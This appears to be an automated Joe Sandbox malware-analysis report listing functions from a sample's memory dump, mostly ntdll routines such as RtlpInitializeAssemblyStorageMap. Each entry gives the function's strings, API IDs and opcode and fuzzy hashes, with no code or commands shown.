                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                • Opcode ID: 5e9e1b34d980c01fb6ba5ced96751f7653da78c7a981628c5f64203c38f31fd0
                                                                                                                                                                                • Instruction ID: 7b4038028fe4cde1f18a3d716291dc96af47a4f1f65d175bbcaded2aeea1c44e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e9e1b34d980c01fb6ba5ced96751f7653da78c7a981628c5f64203c38f31fd0
                                                                                                                                                                                • Instruction Fuzzy Hash: AB3170B5949301AFD311CF28C8C0A5BBBF8FB85668F44492EF99593264D634DD088B93
                                                                                                                                                                                Function 333633D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 333A289F
                                                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 333A289A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                                                • Opcode ID: 0e867f76fd2726c37cbaaef045a9cbae07931d16ab033f2e3ca86125b13173f2
                                                                                                                                                                                • Instruction ID: 83e2987466b0c6ad1506d95df91d8ea5282f7a238e8d89070e7976053f08c76c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e867f76fd2726c37cbaaef045a9cbae07931d16ab033f2e3ca86125b13173f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F110676F05304BFE71A8E49CC81F5A76ADDB84754F24C029B904DB258DA74CD4086A1
                                                                                                                                                                                Function 3333C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                • Opcode ID: 74b66ad69523aba0141c3ec795220b95f59749d420d7fb978d2b55d9208d03fe
                                                                                                                                                                                • Instruction ID: c908381dbae2cbaaf86d070443a381aa031b459d51514479414eb712cdf68233
                                                                                                                                                                                • Opcode Fuzzy Hash: 74b66ad69523aba0141c3ec795220b95f59749d420d7fb978d2b55d9208d03fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 38824B79E423088FEB14CFA9C8807EDB7B5BF4A760F14C169E859AB250DB349D45CB50
                                                                                                                                                                                Function 3335B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @[B3@[B3
                                                                                                                                                                                • API String ID: 0-1327373317
                                                                                                                                                                                • Opcode ID: 8c883e2ea886d2d629984dd61bbb4c7d9905ec48da94b839fa83b9dd7df44166
                                                                                                                                                                                • Instruction ID: 56f3227873dfe2f520c6ed6c158728a79e16506ad4b145c97365cdec13b58b6f
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c883e2ea886d2d629984dd61bbb4c7d9905ec48da94b839fa83b9dd7df44166
                                                                                                                                                                                • Instruction Fuzzy Hash: 5932AEB5E01219DFEB14CFA8C880BAEBBB5FF54744F188069F845AB390E7759941CB90
                                                                                                                                                                                Function 3335E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6fad78a40c6f41648db8b8037f7ffea7573cc6b7b74426b2bd6ef9af96e598db
                                                                                                                                                                                • Instruction ID: 1e27a3e83eb5a1ed41cdbb5b9641e721e2b784c84d66852772eb372e92a35684
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fad78a40c6f41648db8b8037f7ffea7573cc6b7b74426b2bd6ef9af96e598db
                                                                                                                                                                                • Instruction Fuzzy Hash: 1BA1F171E42314EFFB11CFA4C884FDEB7A8AB04B54F058265E950BB6A0DB749944CB85
                                                                                                                                                                                Function 33331051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 532ce68a06ba49636e0223b398332f71feda2e37b89f99fa879ad71ca9029c25
                                                                                                                                                                                • Instruction ID: 20a50ae60eaeebb139add5a90334310cf02f610ef9c33628f3f3c3bfe6a89542
                                                                                                                                                                                • Opcode Fuzzy Hash: 532ce68a06ba49636e0223b398332f71feda2e37b89f99fa879ad71ca9029c25
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB113B5A093408FD354CF28C880A5AFBF1BF89314F588A6EE899DB351D771E945CB42
                                                                                                                                                                                Function 33337623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9b24245633e74a48e5f5eebe3fd67fc4c40f94cc2e24c93cb12c347e0d59e706
                                                                                                                                                                                • Instruction ID: c6044f10b4eb90f2a1005b603922f5a91368e6fab529e1d55e64df87a277cc5d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b24245633e74a48e5f5eebe3fd67fc4c40f94cc2e24c93cb12c347e0d59e706
                                                                                                                                                                                • Instruction Fuzzy Hash: A0615275E01606EFDB08CF68C880AADFBB5BF89354F14C16EE419A7340DB74A9518F90
                                                                                                                                                                                Function 3333254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 0fa8be7d0f06acf998bcb8ab810b68e880efe0fd2db1c03eaaa358dcbada9f6c
                                                                                                                                                                                • Instruction ID: 6eda8cb0aa939fef9758c02ded68d3aba72c174aa6f388d891ff95cbeaa3e294
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fa8be7d0f06acf998bcb8ab810b68e880efe0fd2db1c03eaaa358dcbada9f6c
                                                                                                                                                                                • Instruction Fuzzy Hash: F941BD71D8A704CFE310DF24D990A49B7F5FF46364F14C2AAD456EB6A0DB70AA41CB41
                                                                                                                                                                                Function 33334779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 1e07191ed4f3c570ed657cae90166a18fd21c28b88df7ef1088ec6fa5fc0edac
                                                                                                                                                                                • Instruction ID: 485fb3b6d2f6c85538271051752870e27e1d0b9b38e07097b9c08e35ea108ff5
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e07191ed4f3c570ed657cae90166a18fd21c28b88df7ef1088ec6fa5fc0edac
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C41E474A453418FE311CF28DC94B2ABBE9EF82761F54C42DE541DB2A0DB35D891CB91
                                                                                                                                                                                Function 333356E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: eb459e525d353892c78455183bf7d2ef97c92114ccb5acb0889c7146237b8b78
                                                                                                                                                                                • Instruction ID: 86dcd5859f31c237bbd01b7ba0d3984c7c462166b89407e0bc7979b8f9dbfd80
                                                                                                                                                                                • Opcode Fuzzy Hash: eb459e525d353892c78455183bf7d2ef97c92114ccb5acb0889c7146237b8b78
                                                                                                                                                                                • Instruction Fuzzy Hash: EB318B35B16A05EFE7469F24CE80A99BBA9FF85260F44D055E84187E51CB35E830CF80
                                                                                                                                                                                Function 333DE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 597604e0f054b501df3a3cc8a26fe5e33e6a174887e4a2e0ad8df6b9af3c101a
                                                                                                                                                                                • Instruction ID: 2d3ecf1cd211c1432a1c757304ed65a9fff2dea1a621922dc90e0f6838deb712
                                                                                                                                                                                • Opcode Fuzzy Hash: 597604e0f054b501df3a3cc8a26fe5e33e6a174887e4a2e0ad8df6b9af3c101a
                                                                                                                                                                                • Instruction Fuzzy Hash: 78317CB694A301CFC700DF15C84094ABFF5FF89655F4889AEE488AB211D730D905CF96
                                                                                                                                                                                Function 33333536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: cfad00e17c69d3ccd15c21bcbbb04c91c9a15d0226f9a363bb2c2c2a543d7098
                                                                                                                                                                                • Instruction ID: e62c5f129d24b9926476c49dcc4651a9ad7865997079d151bd63c01daef69a82
                                                                                                                                                                                • Opcode Fuzzy Hash: cfad00e17c69d3ccd15c21bcbbb04c91c9a15d0226f9a363bb2c2c2a543d7098
                                                                                                                                                                                • Instruction Fuzzy Hash: 2821D53594B7409FE722DF05D984B1ABBE5EF81B30F49C469E841A7641CBB4E848CB92
                                                                                                                                                                                Function 333BA130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 02aaa18042dfe82778055d6ce272edfb9c5307fd41e7b06f86351e6ab5bc0c9b
                                                                                                                                                                                • Instruction ID: 5955ea1e66cabfe4c214e34bd69b34a2bf5b43b28813bfd2ba4bcb307c79aaab
                                                                                                                                                                                • Opcode Fuzzy Hash: 02aaa18042dfe82778055d6ce272edfb9c5307fd41e7b06f86351e6ab5bc0c9b
                                                                                                                                                                                • Instruction Fuzzy Hash: 9001573A511659ABDF029F84CC40EDA7FB6FB4C794F068111FE28A6620C636D971EB80
                                                                                                                                                                                Function 333292AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 468dac7ef4336beeecbf20c3041d36704852c8fd468ba6cc516060a3241469ae
                                                                                                                                                                                • Instruction ID: 0b40ad7c089774bd6ddf1bdc8713c143679bbff10dfc28a3f4d570e87ecb9402
                                                                                                                                                                                • Opcode Fuzzy Hash: 468dac7ef4336beeecbf20c3041d36704852c8fd468ba6cc516060a3241469ae
                                                                                                                                                                                • Instruction Fuzzy Hash: FEF0FA32240704AFD331DF09CC04F9ABBEDEF80B10F08012CA982E3490CAA0E909C660
                                                                                                                                                                                Function 3333965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                • Instruction ID: 9cd6eb86c31093fe516fad2626c448bb6727e12fdb20dcd57e368194cdcceb4a
                                                                                                                                                                                • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 80613975D46719EFEB118F99C880BDEBBB8EF45760F14C169E810E7690DB748A01CB90
                                                                                                                                                                                Function 333402F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                • API String ID: 0-232158463
                                                                                                                                                                                • Opcode ID: f4083b9999d1b2b071640780b547992c107bf024d92a3d4dfcd5b1a07833d25a
                                                                                                                                                                                • Instruction ID: 52a2e81f56fcb89df7c3b5d4ca7b0a0b7995a72bae6fa2aa5b5477b02f29d2d1
                                                                                                                                                                                • Opcode Fuzzy Hash: f4083b9999d1b2b071640780b547992c107bf024d92a3d4dfcd5b1a07833d25a
                                                                                                                                                                                • Instruction Fuzzy Hash: CD711971E00249DFEB05DFA8C980BAEBBF8FF08744F148165E945E7651EA38E951CB60
                                                                                                                                                                                Function 333F86A8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0hB3
                                                                                                                                                                                • API String ID: 0-3929338292
                                                                                                                                                                                • Opcode ID: baa4ee14b703cda2bfacc371818c150b4fa02957c5849b91156c3d61d19d5cff
                                                                                                                                                                                • Instruction ID: 1ed1e6af81d9cfef64c55901178ed786e0355a731fc162c008d90dda5a696050
                                                                                                                                                                                • Opcode Fuzzy Hash: baa4ee14b703cda2bfacc371818c150b4fa02957c5849b91156c3d61d19d5cff
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B410875B407109BD71DCE29CC90B6BB79AEF807A2FC4C218F8598F690DB36D825C691
                                                                                                                                                                                Function 3334E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                • Opcode ID: 3e4b22b2cf2aa47bd17fb6ceeb52d892f13b3a84485aaaacb961a79a8fd16f00
                                                                                                                                                                                • Instruction ID: 8156f7b72b7127f6c902854cc0a20bf0cc5bc0f4a81990bad9d08ccf61d0a548
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4b22b2cf2aa47bd17fb6ceeb52d892f13b3a84485aaaacb961a79a8fd16f00
                                                                                                                                                                                • Instruction Fuzzy Hash: 1141C276D1A3119BE310CF64C880F6FB7E8AF88714F448A2DF584E7190EA78C9048B93
                                                                                                                                                                                Function 333641BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                • Instruction ID: d8f963a62adac69224f9370ef3c473ac89cda10c51de49677498e8b4def7c968
                                                                                                                                                                                • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                • Instruction Fuzzy Hash: C9516971905710AFD321CF19C881A6BB7E8FF48710F00892EFA95D76A0E774E954CB91
                                                                                                                                                                                Function 333AC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                • Opcode ID: 739c9ef971bcc5709197afd170df61b51391775928a64631c818a6ed1a81492e
                                                                                                                                                                                • Instruction ID: 308a4dc171e5d7dfc67a0c3933be0b7c13986685fcd87759e53e4af3ab21c755
                                                                                                                                                                                • Opcode Fuzzy Hash: 739c9ef971bcc5709197afd170df61b51391775928a64631c818a6ed1a81492e
                                                                                                                                                                                • Instruction Fuzzy Hash: CD4130B1D0162DAADB21DE54DC81FDEB77CEB44714F0085A5A609EB140DB349E898FA8
                                                                                                                                                                                Function 333307A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 23
                                                                                                                                                                                • API String ID: 0-3336434291
                                                                                                                                                                                • Opcode ID: d92e7d94d2cabbd739040253ef66cba75d225d5a80bdf63f6736ca37d315a4c5
                                                                                                                                                                                • Instruction ID: 3aa292a62240381afd1357564c1957b953f75a7239fc720323e5f68dfa9f8969
                                                                                                                                                                                • Opcode Fuzzy Hash: d92e7d94d2cabbd739040253ef66cba75d225d5a80bdf63f6736ca37d315a4c5
                                                                                                                                                                                • Instruction Fuzzy Hash: FE41B270A027019FD324CF28D880952B7F9FF49325B54CA6DD497CBA50EB38E455CB90
